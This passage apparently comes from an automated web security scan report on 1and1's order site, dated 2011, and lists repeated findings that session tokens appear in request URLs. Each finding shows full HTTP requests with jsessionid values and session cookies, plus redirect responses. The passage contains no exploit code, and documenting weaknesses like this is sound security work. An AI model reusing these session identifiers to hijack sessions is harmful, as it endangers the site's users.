Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:46:04 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSecurityCertificate?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.35. http://order.1and1.com/xml/order/FeatureServerDedOsLinux  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsLinux

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerDedOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:48 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsLinux?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.36. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsLinuxOpt

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerDedOsLinuxOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.37. http://order.1and1.com/xml/order/FeatureServerDedOsWindows  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsWindows

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerDedOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:14 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsWindows?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.38. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerDedOsWindowsOpt

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerDedOsWindowsOpt;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:16 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.39. http://order.1and1.com/xml/order/FeatureServerFirewall  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerFirewall

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerFirewall;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:54 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerFirewall?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.40. http://order.1and1.com/xml/order/FeatureServerHarddrive  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerHarddrive

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerHarddrive;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:52:07 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerHarddrive?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.41. http://order.1and1.com/xml/order/FeatureServerMonitoring  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerMonitoring

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerMonitoring;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:50:36 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerMonitoring?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.42. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerMonitoringCloud

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerMonitoringCloud;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:12 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerMonitoringCloud?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.43. http://order.1and1.com/xml/order/FeatureServerProcessor  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerProcessor

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerProcessor;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerProcessor?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.44. http://order.1and1.com/xml/order/FeatureServerRecovery  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerRecovery

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerRecovery;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:37 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerRecovery?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.45. http://order.1and1.com/xml/order/FeatureServerSsl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerSsl

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerSsl;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerSsl?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.46. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerVpsOsLinux

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerVpsOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:37 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerVpsOsLinux?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.47. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerVpsOsWindows

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureServerVpsOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:51 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerVpsOsWindows?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.48. http://order.1and1.com/xml/order/FeatureSite-buildingAsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingAsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingAsp;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
